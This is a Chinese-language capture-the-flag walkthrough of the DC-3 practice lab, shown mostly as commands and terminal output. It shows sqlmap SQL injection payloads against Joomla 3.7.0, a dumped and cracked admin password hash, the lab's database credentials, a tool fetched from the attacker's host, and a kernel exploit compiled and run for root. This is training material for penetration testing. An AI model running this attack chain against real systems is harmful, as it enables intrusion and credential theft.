DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.
For those with experience doing CTF and Boot2Root challenges, this probably won’t take you long at all (in fact, it could take you less than 20 minutes easily).
If that’s the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.
DC-3之后不再有提示信息,只有一个最终flag
0x01.老规矩上nmap
可以发现1为网关,2为宿主机,6为kali,那么5就是我们的受害者
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
root@JIYE:~/tmp/DC3# nmap -sP 192.168.1.0/24 -oN nmap.sP Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-21 20:53 EDT Nmap scan report for 192.168.1.1 Host is up (0.0021s latency). MAC Address: 68:D1:BA:1F:FD:48 (Shenzhen Youhua Technology) Nmap scan report for 192.168.1.2 Host is up (0.00033s latency). MAC Address: 50:5B:C2:8C:BE:A5 (Liteon Technology) Nmap scan report for 192.168.1.5 Host is up (0.00026s latency). MAC Address: 00:0C:29:63:7B:83 (VMware) Nmap scan report for 192.168.1.6 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 2.09 seconds root@JIYE:~/tmp/DC3#
附加:使用netdiscover也可以
1 2 3 4 5 6 7 8 9
root@JIYE:~/tmp/DC3# netdiscover Currently scanning: 192.168.21.0/16 | Screen View: Unique Hosts 8 Captured ARP Req/Rep packets, from 3 hosts. Total size: 480 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.1.2 50:5b:c2:8c:be:a5 6 360 Liteon Technology Corporation 192.168.1.1 68:d1:ba:1f:fd:48 1 60 Shenzhen YOUHUA Technology Co., Ltd 192.168.1.5 00:0c:29:63:7b:83 1 60 VMware, Inc.
root@JIYE:~/tmp/DC3# nmap -A 192.168.1.5 -p 1-65535 -oN nmap.A Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-21 21:02 EDT Nmap scan report for 192.168.1.5 Host is up (0.00051s latency). Not shown: 65534 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-generator: Joomla! - Open Source Content Management |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Home MAC Address: 00:0C:29:63:7B:83 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop
TRACEROUTE HOP RTT ADDRESS 1 0.51 ms 192.168.1.5
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.28 seconds root@JIYE:~/tmp/DC3#
... [21:42:32] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.1 [21:42:32] [INFO] fetching database names [21:42:32] [INFO] retrieved: 'information_schema' [21:42:32] [INFO] retrieved: 'joomladb' [21:42:32] [INFO] retrieved: 'mysql' [21:42:32] [INFO] retrieved: 'performance_schema' [21:42:32] [INFO] retrieved: 'sys' available databases [5]: [*] information_schema [*] joomladb [*] mysql [*] performance_schema [*] sys
[21:42:32] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 2670 times [21:42:32] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.5'
root@JIYE:~/tmp/DC3# sqlmap -u "http://192.168.1.5/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering] ___ __H__ ___ ___["]_____ ___ ___ {1.4.8#stable} |_ -| . ['] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 21:51:56 /2020-08-21/ [21:51:56] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2' from file '/usr/share/sqlmap/data/txt/user-agents.txt' [21:51:56] [INFO] resuming back-end DBMS 'mysql' [21:51:56] [INFO] testing connection to the target URL [21:51:56] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=k3m9bafm9dg...dg5cjc6tq0'). Do you want to use those [Y/n] sqlmap resumed the following injection point(s) from stored session: --- Parameter: list[fullordering] (GET) Type: error-based Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(8495,CONCAT(0x2e,0x7170786b71,(SELECT (ELT(8495=8495,1))),0x7170786b71),8473)) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 8890 FROM (SELECT(SLEEP(5)))cGDb) --- [21:51:59] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.1 [21:51:59] [INFO] fetching current database [21:51:59] [INFO] retrieved: 'joomladb' current database: 'joomladb' [21:51:59] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 2 times [21:51:59] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.5' [*] ending @ 21:51:59 /2020-08-21/ root@JIYE:~/tmp/DC3#
[21:54:04] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 93 times [21:54:04] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.5'
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 21:59:25 /2020-08-21/ [21:59:25] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8' from file '/usr/share/sqlmap/data/txt/user-agents.txt' [21:59:25] [INFO] resuming back-end DBMS 'mysql' [21:59:25] [INFO] testing connection to the target URL [21:59:26] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=ug2jkbpm6cl...hvfgeqmmq0'). Do you want to use those [Y/n] sqlmap resumed the following injection point(s) from stored session: --- Parameter: list[fullordering] (GET) Type: error-based Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(8495,CONCAT(0x2e,0x7170786b71,(SELECT (ELT(8495=8495,1))),0x7170786b71),8473)) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 8890 FROM (SELECT(SLEEP(5)))cGDb) --- [21:59:31] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.1 [21:59:31] [INFO] fetching columns for table '#__users' in database 'joomladb' [21:59:32] [WARNING] unable to retrieve column names for table '#__users'in database 'joomladb' do you want to use common column existence check? [y/N/q] y [21:59:54] [WARNING] incase of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' which common columns (wordlist) file do you want to use? [1] default '/usr/share/sqlmap/data/txt/common-columns.txt' (press Enter) [2] custom > 1 [22:00:00] [INFO] checking column existence using items from '/usr/share/sqlmap/data/txt/common-columns.txt' [22:00:00] [INFO] adding words used on web page to the check list please enter number of threads? [Enter for 1 (current)] 10 [22:00:07] [INFO] starting 10 threads [22:00:07] [INFO] retrieved: id [22:00:07] [INFO] retrieved: name [22:00:07] [INFO] retrieved: username [22:00:08] [INFO] retrieved: email [22:00:11] [INFO] retrieved: password [22:00:51] [INFO] retrieved: params Database: joomladb Table: #__users [6 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | email | non-numeric | | id | numeric | | name | non-numeric | | params | non-numeric | | password | non-numeric | | username | non-numeric | +----------+-------------+
[22:01:02] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 2649 times [22:01:02] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.5'
root@JIYE:~/tmp/DC3# sqlmap -u "http://192.168.1.5/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C "name,password" --dump -p list[fullordering] ___ __H__ ___ ___[']_____ ___ ___ {1.4.8#stable} |_ -| . ["] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 22:06:02 /2020-08-21/ [22:06:02] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE) AppleWebKit/523.13 (KHTML, like Gecko) Version/3.0 Safari/523.13' from file '/usr/share/sqlmap/data/txt/user-agents.txt' [22:06:02] [INFO] resuming back-end DBMS 'mysql' [22:06:02] [INFO] testing connection to the target URL [22:06:02] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=8hrfk2ep2le...ioqrv6v505'). Do you want to use those [Y/n] sqlmap resumed the following injection point(s) from stored session: --- Parameter: list[fullordering] (GET) Type: error-based Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(8495,CONCAT(0x2e,0x7170786b71,(SELECT (ELT(8495=8495,1))),0x7170786b71),8473)) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 8890 FROM (SELECT(SLEEP(5)))cGDb) --- [22:06:04] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.1 [22:06:04] [INFO] fetching entries of column(s) 'name, password' for table '#__users' in database 'joomladb' [22:06:04] [INFO] retrieved: 'admin' [22:06:04] [INFO] retrieved: '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' Database: joomladb Table: #__users [1 entry] +-------+--------------------------------------------------------------+ | name | password | +-------+--------------------------------------------------------------+ | admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu | +-------+--------------------------------------------------------------+ [22:06:04] [INFO] table 'joomladb.`#__users`' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.1.5/dump/joomladb/#__users.csv' [22:06:04] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 6 times [22:06:04] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.5' [*] ending @ 22:06:04 /2020-08-21/ root@JIYE:~/tmp/DC3#
0x11.使用john解密
密码:snoopy
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
root@JIYE:~/tmp/DC3# john joomla_v3.7.0_ joomla_v3.7.0_admin_hash.txt joomla_v3.7.0_sqli.txt root@JIYE:~/tmp/DC3# john joomla_v3.7.0_admin_hash.txt Created directory: /root/.john Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 1024 for all loaded hashes Will run 4 OpenMP threads Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, almost any other key for status Almost done: Processing the remaining buffered candidate passwords, if any. Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist snoopy (?) 1g 0:00:00:00 DONE 2/3 (2020-08-21 22:10) 3.448g/s 124.1p/s 124.1c/s 124.1C/s 123456..buster Use the "--show" option to display all of the cracked passwords reliably Session completed root@JIYE:~/tmp/DC3#
www-data@DC-3:/var/www/html$ cat configuration.php <?php class JConfig { public $offline = '0'; public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.'; public $display_offline_message = '1'; public $offline_image = ''; public $sitename = 'DC-3'; public $editor = 'tinymce'; public $captcha = '0'; public $list_limit = '20'; public $access = '1'; public $debug = '0'; public $debug_lang = '0'; public $dbtype = 'mysqli'; public $host = 'localhost'; public $user = 'root'; public $password = 'squires'; public $db = 'joomladb'; public $dbprefix = 'd8uea_'; public $live_site = ''; public $secret = '7M6S1HqGMvt1JYkY'; public $gzip = '0'; public $error_reporting = 'default'; public $helpurl = 'https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}'; public $ftp_host = '127.0.0.1'; public $ftp_port = '21'; public $ftp_user = ''; public $ftp_pass = ''; public $ftp_root = ''; public $ftp_enable = '0'; public $offset = 'UTC'; public $mailonline = '1'; public $mailer = 'mail'; public $mailfrom = 'freddy@norealaddress.net'; public $fromname = 'DC-3'; public $sendmail = '/usr/sbin/sendmail'; public $smtpauth = '0'; public $smtpuser = ''; public $smtppass = ''; public $smtphost = 'localhost'; public $smtpsecure = 'none'; public $smtpport = '25'; public $caching = '0'; public $cache_handler = 'file'; public $cachetime = '15'; public $cache_platformprefix = '0'; public $MetaDesc = 'A website for DC-3'; public $MetaKeys = ''; public $MetaTitle = '1'; public $MetaAuthor = '1'; public $MetaVersion = '0'; public $robots = ''; public $sef = '1'; public $sef_rewrite = '0'; public $sef_suffix = '0'; public $unicodeslugs = '0'; public $feed_limit = '10'; public $feed_email = 'none'; public $log_path = '/var/www/html/administrator/logs'; public $tmp_path = '/var/www/html/tmp'; public $lifetime = '15'; public $session_handler = 'database'; public $shared_session = '0'; } www-data@DC-3:/var/www/html$
很显然这回没有狗屎运了
1 2 3 4 5 6
www-data@DC-3:/var/www/html$ sudo -l [sudo] password for www-data: Sorry, try again. [sudo] password for www-data: Sorry, try again. [sudo] password for www-data:
3.利用系统内核提权
查看系统内核提权
1 2 3 4 5 6 7 8 9
www-data@DC-3:/tmp$ uname -a Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux www-data@DC-3:/tmp$ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04 LTS Release: 16.04 Codename: xenial www-data@DC-3:/tmp$
将linux-exploit-suggester复制到DC3上
1 2 3 4 5 6 7 8
root@JIYE:~/tmp/DC3# cp linux-exploit-suggester.sh /root root@JIYE:~/tmp/DC3# cd root@JIYE:~# root@JIYE:~# root@JIYE:~# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ... 192.168.1.5 - - [22/Aug/2020 02:06:47] "GET /linux-exploit-suggester.sh HTTP/1.1" 200 -
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
www-data@DC-3:/tmp$ wget 192.168.1.6/linux-exploit-suggester.sh --2020-08-22 16:07:27-- http://192.168.1.6/linux-exploit-suggester.sh Connecting to 192.168.1.6:80... connected. HTTP request sent, awaiting response... 200 OK Length: 84889 (83K) [text/x-sh] Saving to: 'linux-exploit-suggester.sh'
linux-exploit-sugge 100%[===================>] 82.90K --.-KB/s in 0s
Kernel version: 4.4.0 Architecture: i686 Distribution: ubuntu Distribution version: 16.04 Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed Package listing: from current OS
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808 Exposure: highly probable Tags: [ ubuntu=16.04{kernel:4.4.0-21-generic} ] Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2017-7308] af_packet
Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html Exposure: probable Tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic} Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3 Exposure: probable Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic} Download URL: https://www.exploit-db.com/download/41458 Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-1000112] NETIF_F_UFO
Details: http://www.openwall.com/lists/oss-security/2017/08/13/1 Exposure: probable Tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*} Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels
[+] [CVE-2019-18634] sudo pwfeedback
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/ Exposure: less probable Tags: mint=19 Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c Comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2019-15666] XFRM_UAF
Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc Exposure: less probable Download URL: Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE
Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793 Exposure: less probable Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only
[+] [CVE-2016-2384] usb-midi
Details: https://xairy.github.io/blog/2016/cve-2016-2384 Exposure: less probable Tags: ubuntu=14.04,fedora=22 Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
[+] [CVE-2016-0728] keyring
Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/ Exposure: less probable Download URL: https://www.exploit-db.com/download/40003 Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
www-data@DC-3:/tmp$ cd 39772 www-data@DC-3:/tmp/39772$ ls crasher.tar exploit.tar www-data@DC-3:/tmp/39772$ tar -xvf exploit.tar ebpf_mapfd_doubleput_exploit/ ebpf_mapfd_doubleput_exploit/hello.c ebpf_mapfd_doubleput_exploit/suidhelper.c ebpf_mapfd_doubleput_exploit/compile.sh ebpf_mapfd_doubleput_exploit/doubleput.c www-data@DC-3:/tmp/39772$ ls crasher.tar ebpf_mapfd_doubleput_exploit exploit.tar www-data@DC-3:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit/ www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls compile.sh doubleput.c hello.c suidhelper.c www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ chmod +x compile.sh www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh doubleput.c: In function'make_setuid': doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] .insns = (__aligned_u64) insns, ^ doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] .license = (__aligned_u64)"" ^ www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$
编译生成执行文件,进行利用
1 2 3 4 5 6 7 8 9
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput starting writev woohoo, got pointer reuse writev returned successfully. if this worked, you'll have a root shell in <=60 seconds. suid file detected, launching rootshell... we have root privs now... root@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit#
